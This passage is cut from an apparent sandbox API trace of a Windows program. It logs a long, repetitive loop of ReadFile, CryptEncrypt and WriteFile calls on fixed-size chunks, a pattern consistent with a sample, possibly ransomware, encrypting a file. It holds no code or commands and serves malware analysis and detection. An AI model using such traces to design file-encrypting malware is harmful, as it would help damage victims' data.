pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.129] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.129] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.129] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.129] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.129] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.130] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.130] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.130] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.130] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.131] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.131] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.131] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.131] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.131] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.131] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.132] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.132] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.132] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.132] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.132] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.132] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.133] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.133] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.133] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.133] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.133] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.133] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.133] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.133] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.134] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.134] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.134] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.134] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.134] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.134] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.134] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.134] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.135] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.135] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.135] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.135] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.135] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.135] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.135] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.135] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.135] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.135] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.135] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.136] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.136] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.136] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.136] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.136] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.136] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.136] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.136] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.136] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.136] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.136] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.136] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.136] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.137] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.137] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.137] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.137] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.137] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.137] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.137] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.137] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.138] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.138] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, 